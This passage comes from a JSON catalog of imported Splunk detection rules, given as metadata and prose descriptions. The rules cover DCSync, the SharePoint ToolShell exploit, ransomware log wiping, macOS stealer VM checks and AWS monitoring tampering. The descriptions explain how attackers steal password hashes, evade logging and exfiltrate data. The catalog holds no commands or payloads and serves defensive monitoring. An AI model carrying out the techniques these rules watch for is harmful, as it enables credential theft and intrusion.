This behavior is a strong signal\nfor ingress tool transfer and staging of payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cabinet-file-extraction-via-expand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e3e3b8c-6d3a-4b47-9f5a-9e3e0a0a6f2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cabinet_file_extraction_via_expand.yml" } }, { "id": "splunk-security-content-4e41ad21-9761-426d-8aa1-083712ff9f30", "type": "detection", "name": "MacOS AMOS Stealer - Virtual Machine Check Activity", "description": "The following analytic detects AMOS Stealer VM check activity on macOS. 
It leverages osquery to monitor process events and identifies the execution of the \"osascript\" command along with specific commandline strings.\nThis activity is significant as AMOS stealer was seen using this pattern in order to check if the host is a Virtual Machine or not.\nIf confirmed malicious, this behavior indicates that the host is already infected by the AMOS stealer, which could allow attackers to execute arbitrary code, escalate privileges, steal information, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-amos-stealer-virtual-machine-check-activity.yaml", "provenance": { "source": "splunk/security_content", "source_id": "4e41ad21-9761-426d-8aa1-083712ff9f30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_amos_stealer___virtual_machine_check_activity.yml" } }, { "id": "splunk-security-content-4e5e024e-fabb-11eb-8b8f-acde48001122", "type": "detection", "name": "Fsutil Zeroing File", "description": "The following analytic detects the execution of the 'fsutil' command with the 'setzerodata' parameter, which zeros out a target file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is a technique used by ransomware, such as LockBit, to evade detection by erasing its malware path after encrypting the host. 
If confirmed malicious, this action could hinder forensic investigations and allow attackers to cover their tracks, complicating incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fsutil-zeroing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e5e024e-fabb-11eb-8b8f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/fsutil_zeroing_file.yml" } }, { "id": "splunk-security-content-4e6c9d2a-8f3b-4c7e-9a5f-2d8b6e1c4a9f", "type": "detection", "name": "Cisco ASA - Logging Message Suppression", "description": "This analytic detects suppression of specific logging messages on Cisco ASA devices using the \"no logging message\" command.\nAdversaries may suppress specific log message IDs to selectively disable logging of security-critical events such as authentication failures, configuration changes, or suspicious network activity. 
This targeted approach allows attackers to evade detection while maintaining normal logging operations that might otherwise alert administrators to complete logging disablement.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing the \"no logging message\" command, which is used to suppress specific message IDs from being logged regardless of the configured severity level.\nInvestigate unauthorized message suppression, especially suppression of security-critical message IDs (authentication, authorization, configuration changes), suppression performed by non-administrative accounts, during unusual hours, or without documented justification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002", "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-message-suppression.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e6c9d2a-8f3b-4c7e-9a5f-2d8b6e1c4a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_message_suppression.yml" } }, { "id": "splunk-security-content-4e7c2f85-8f02-4bd2-a48b-5ec98a2c5f72", "type": "detection", "name": "Windows SQLCMD Execution", "description": "This detection identifies potentially suspicious usage of sqlcmd.exe, focusing on command patterns that may indicate data exfiltration, reconnaissance, or malicious database operations. 
The detection looks for both short-form (-X) and long-form (--flag) suspicious parameter combinations, which have been observed in APT campaigns targeting high-value organizations. For example, threat actors like CL-STA-0048 have been known to abuse sqlcmd.exe for data theft and exfiltration from compromised MSSQL servers. The detection monitors for suspicious authentication attempts, output redirection, and potentially malicious query patterns that could indicate unauthorized database access or data theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e7c2f85-8f02-4bd2-a48b-5ec98a2c5f72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlcmd_execution.yml" } }, { "id": "splunk-security-content-4f3b0c97-657e-4547-a89a-9a50c656e3cd", "type": "detection", "name": "Kubernetes Anomalous Inbound Outbound Network IO", "description": "The following analytic identifies high inbound or outbound network I/O anomalies in Kubernetes containers. It leverages process metrics from an OTEL collector and Kubelet Stats Receiver, along with data from Splunk Observability Cloud. A lookup table with average and standard deviation values for network I/O is used to detect anomalies persisting over a 1-hour period. 
This activity is significant as it may indicate data exfiltration, command and control communication, or unauthorized data transfers. If confirmed malicious, it could lead to data breaches, service outages, financial losses, and reputational damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-outbound-network-io.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f3b0c97-657e-4547-a89a-9a50c656e3cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_outbound_network_io.yml" } }, { "id": "splunk-security-content-4f546cf4-15aa-4368-80f7-940e92bc551e", "type": "detection", "name": "Windows Chromium Browser with Custom User Data Directory", "description": "The following analytic detects instances where the Chromium-based browser (e.g., Google Chrome, Microsoft Edge) is launched with the --user-data-dir command-line argument. 
While this flag is legitimate and used for multi-profile support or automation, it is frequently leveraged by malware and adversaries to run Chrome in an isolated environment for stealth operations, credential harvesting, phishing delivery, or evasion of user session artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-with-custom-user-data-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f546cf4-15aa-4368-80f7-940e92bc551e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_with_custom_user_data_directory.yml" } }, { "id": "splunk-security-content-4f568a0e-896f-4d94-a2f7-fa6d82ab1f77", "type": "detection", "name": "GitHub Organizations Repository Archived", "description": "The following analytic detects when a repository is archived in GitHub Organizations. The detection monitors GitHub Organizations audit logs for repository archival events by tracking actor details, repository information, and associated metadata. For a SOC, identifying repository archival is important as it could indicate attempts to make critical code inaccessible or preparation for repository deletion. While archiving is a legitimate feature, unauthorized archival of active repositories could signal account compromise, insider threats, or attempts to disrupt development operations. 
The impact of unauthorized repository archival includes loss of active development access, disruption to workflows and CI/CD pipelines, and potential business delays if critical repositories are affected. Additionally, archived repositories may be targeted for subsequent deletion, potentially resulting in permanent loss of intellectual property if proper backups are not maintained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-repository-archived.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f568a0e-896f-4d94-a2f7-fa6d82ab1f77", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_repository_archived.yml" } }, { "id": "splunk-security-content-4f7e3913-4db3-4ccd-afe4-31198982305d", "type": "detection", "name": "Windows BootLoader Inventory", "description": "The following analytic identifies the bootloader paths on Windows endpoints. It leverages a PowerShell Scripted input to capture this data, which is then processed and aggregated using Splunk. Monitoring bootloader paths is significant for a SOC as it helps detect unauthorized modifications that could indicate bootkits or other persistent threats. 
If confirmed malicious, such activity could allow attackers to maintain persistence, bypass security controls, and potentially control the boot process, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bootloader-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f7e3913-4db3-4ccd-afe4-31198982305d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bootloader_inventory.yml" } }, { "id": "splunk-security-content-4f9564dd-a204-4f22-b375-4dfca3a68731", "type": "detection", "name": "Windows Increase in Group or Object Modification Activity", "description": "This analytic detects an increase in modifications to AD groups or objects. Frequent changes to AD groups or objects can indicate potential security risks, such as unauthorized access attempts, impairing defences or establishing persistence. 
By monitoring AD logs for unusual modification patterns, this detection helps identify suspicious behavior that could compromise the integrity and security of the AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-increase-in-group-or-object-modification-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f9564dd-a204-4f22-b375-4dfca3a68731", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_increase_in_group_or_object_modification_activity.yml" } }, { "id": "splunk-security-content-4fa7f846-054a-11ec-a836-acde48001122", "type": "detection", "name": "Get-DomainTrust with PowerShell", "description": "The following analytic identifies the execution of the Get-DomainTrust command from PowerView using PowerShell, which is used to gather domain trust information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant as it indicates potential reconnaissance efforts by an adversary to understand domain trust relationships, which can inform lateral movement strategies. 
If confirmed malicious, this could allow attackers to map out the network, identify potential targets, and plan further attacks, potentially compromising additional systems within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domaintrust-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fa7f846-054a-11ec-a836-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domaintrust_with_powershell.yml" } }, { "id": "splunk-security-content-4fbf9270-43da-11ec-9486-acde48001122", "type": "detection", "name": "Windows InstallUtil Remote Network Connection", "description": "The following analytic detects the Windows InstallUtil.exe binary making a remote network connection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network telemetry. This activity is significant because InstallUtil.exe can be exploited to download and execute malicious code, bypassing application control mechanisms. If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise, data exfiltration, or lateral movement within the network. 
Analysts should review the parent process, network connections, and any associated file modifications to determine the legitimacy of this activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-remote-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fbf9270-43da-11ec-9486-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_remote_network_connection.yml" } }, { "id": "splunk-security-content-4fc4c031-e5be-4cc0-8cf9-49f9f507bcb5", "type": "detection", "name": "Linux PHP Privilege Escalation", "description": "The following analytic detects the execution of PHP commands with elevated privileges on a Linux system. It identifies instances where PHP is used in conjunction with 'sudo' and 'system' commands, indicating an attempt to run system commands as the root user. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments. This activity is significant because it can indicate an attempt to escalate privileges, potentially leading to full root access. 
If confirmed malicious, this could allow an attacker to execute arbitrary commands with root privileges, compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-php-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fc4c031-e5be-4cc0-8cf9-49f9f507bcb5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_php_privilege_escalation.yml" } }, { "id": "splunk-security-content-4fee57b8-d825-4bf3-9ea8-bf405cdb614c", "type": "detection", "name": "Windows System Shutdown CommandLine", "description": "The following analytic identifies the execution of the Windows shutdown command via the command line interface. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because attackers may use the shutdown command to erase tracks, cause disruption, or ensure changes take effect after installing backdoors. 
If confirmed malicious, this activity could lead to system downtime, denial of service, or evasion of security tools, impacting the overall security posture of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-shutdown-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fee57b8-d825-4bf3-9ea8-bf405cdb614c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_shutdown_commandline.yml" } }, { "id": "splunk-security-content-4ff9767b-fdf2-489c-83a5-c6c34412d72e", "type": "detection", "name": "Windows Modify Registry DontShowUI", "description": "The following analytic detects modifications to the Windows Error Reporting registry key \"DontShowUI\" to suppress error reporting dialogs. It leverages data from the Endpoint datamodel's Registry node to identify changes where the registry value is set to 0x00000001. This activity is significant as it is commonly associated with DarkGate malware, which uses this modification to avoid detection during its installation. 
If confirmed malicious, this behavior could allow attackers to maintain a low profile, avoiding user alerts and potentially enabling further malicious activities without user intervention.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-dontshowui.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4ff9767b-fdf2-489c-83a5-c6c34412d72e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_dontshowui.yml" } }, { "id": "splunk-security-content-5029b681-0462-47b7-82e7-f7e3d37f5a2d", "type": "detection", "name": "ASL AWS Defense Evasion Impair Security Services", "description": "The following analytic detects the deletion of critical AWS Security Services configurations, such as CloudWatch alarms, GuardDuty detectors, and Web Application Firewall rules. It leverages Amazon Security Lake logs to identify specific API calls like \"DeleteLogStream\" and \"DeleteDetector.\" This activity is significant because adversaries often use these actions to disable security monitoring and evade detection. 
If confirmed malicious, this could allow attackers to operate undetected, leading to potential data breaches, unauthorized access, and prolonged persistence within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-impair-security-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5029b681-0462-47b7-82e7-f7e3d37f5a2d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_impair_security_services.yml" } }, { "id": "splunk-security-content-503d17cb-9eab-4cf8-a20e-01d5c6987ae3", "type": "detection", "name": "Batch File Write to System32", "description": "The following analytic detects the creation of a batch file (.bat) within the Windows system directory tree, specifically in the System32 or SysWOW64 folders. It leverages data from the Endpoint datamodel, focusing on process and filesystem events to identify this behavior. This activity is significant because writing batch files to system directories can be indicative of malicious intent, such as persistence mechanisms or system manipulation. 
If confirmed malicious, this could allow an attacker to execute arbitrary commands with elevated privileges, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/batch-file-write-to-system32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "503d17cb-9eab-4cf8-a20e-01d5c6987ae3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/batch_file_write_to_system32.yml" } }, { "id": "splunk-security-content-508b2649-3a1e-4a4c-ba9d-3cc05e1a1b70", "type": "detection", "name": "Windows SharePoint ToolPane Endpoint Exploitation Attempt", "description": "The following analytic detects potential exploitation attempts against Microsoft SharePoint Server vulnerability CVE-2025-53770, also known as \"ToolShell\". This detection monitors for POST requests to the ToolPane.aspx endpoint with specific DisplayMode parameter, which is a key indicator of the exploit. 
This vulnerability allows unauthenticated remote code execution on affected SharePoint servers, enabling attackers to fully access SharePoint content, file systems, internal configurations, and execute code over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-toolpane-endpoint-exploitation-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "508b2649-3a1e-4a4c-ba9d-3cc05e1a1b70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_sharepoint_toolpane_endpoint_exploitation_attempt.yml" } }, { "id": "splunk-security-content-50998483-bb15-457b-a870-965080d9e3d3", "type": "detection", "name": "Windows AD Replication Request Initiated from Unsanctioned Location", "description": "The following analytic identifies unauthorized Active Directory replication requests initiated from non-domain controller locations. It leverages EventCode 4662 to detect when a computer account with replication permissions creates a handle to domainDNS, filtering out known domain controller IP addresses. This activity is significant as it may indicate a DCSync attack, where an attacker with privileged access can request password hashes for any or all users within the domain. 
If confirmed malicious, this could lead to unauthorized access to sensitive information and potential full domain compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-request-initiated-from-unsanctioned-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "50998483-bb15-457b-a870-965080d9e3d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_replication_request_initiated_from_unsanctioned_location.yml" } }, { "id": "splunk-security-content-50eaabf8-5180-4e86-bfb2-011472c359fc", "type": "detection", "name": "O365 Tenant Wide Admin Consent Granted", "description": "The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. This activity is significant because admin consent allows applications to access data across the entire tenant, potentially exposing vast amounts of organizational data. 
If confirmed malicious, an attacker could gain extensive and persistent access to organizational data, leading to data exfiltration, espionage, further malicious activities, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-tenant-wide-admin-consent-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "50eaabf8-5180-4e86-bfb2-011472c359fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_tenant_wide_admin_consent_granted.yml" } }, { "id": "splunk-security-content-510ea428-4731-4d2f-8829-a28293e427aa", "type": "detection", "name": "Windows Linked Policies In ADSI Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell Script Block Logging (EventCode=4104) to query Active Directory for domain organizational units. This detection leverages PowerShell operational logs to identify script blocks containing `[adsisearcher]`, `objectcategory=organizationalunit`, and `findAll()`. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gain situational awareness of the domain structure. 
If confirmed malicious, this could lead to further exploitation, such as privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-linked-policies-in-adsi-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "510ea428-4731-4d2f-8829-a28293e427aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_linked_policies_in_adsi_discovery.yml" } }, { "id": "splunk-security-content-51307514-1236-49f6-8686-d46d93cc2821", "type": "detection", "name": "Windows AD Replication Request Initiated by User Account", "description": "The following analytic detects a user account initiating an Active Directory replication request, indicative of a DCSync attack. It leverages EventCode 4662 from the Windows Security Event Log, focusing on specific object types and replication permissions. This activity is significant because it can allow an attacker with sufficient privileges to request password hashes for any or all users within the domain. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of the entire domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-request-initiated-by-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51307514-1236-49f6-8686-d46d93cc2821", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_replication_request_initiated_by_user_account.yml" } }, { "id": "splunk-security-content-515cccd0-c4d8-4427-92d9-8a8f8b5a71dc", "type": "detection", "name": "ESXi Download Errors", "description": "This detection identifies failed file download attempts on ESXi hosts by looking for specific error messages in the system logs. 
These failures may indicate unauthorized or malicious attempts to install or update components\u2014such as VIBs or scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1601.001", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-download-errors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "515cccd0-c4d8-4427-92d9-8a8f8b5a71dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_download_errors.yml" } }, { "id": "splunk-security-content-51c04fdb-2746-465a-b86e-b413a09c9085", "type": "detection", "name": "AWS Concurrent Sessions From Different Ips", "description": "The following analytic identifies an AWS IAM account with concurrent sessions originating from more than one unique IP address within a 5-minute window. It leverages AWS CloudTrail logs, specifically the `DescribeEventAggregates` event, to detect this behavior. This activity is significant as it may indicate a session hijacking attack, where an adversary uses stolen session cookies to access AWS resources from a different location. 
If confirmed malicious, this could allow unauthorized access to sensitive corporate resources, leading to potential data breaches or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51c04fdb-2746-465a-b86e-b413a09c9085", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-51c43b7b-e406-45d2-9bad-5c67f07e6528", "type": "detection", "name": "MacOS Hidden Files and Directories", "description": "The following analytic detects suspicious creation of hidden files and directories, which may indicate an attacker's attempt to conceal malicious activities or unauthorized data.\nHidden files and directories are often used to evade detection by security tools and administrators, providing a stealthy means for storing malware, logs, or sensitive information.\nBy monitoring for unusual or unauthorized creation of hidden files and directories, this analytic helps identify potential attempts to hide malicious operations, enabling security teams to uncover and address hidden threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
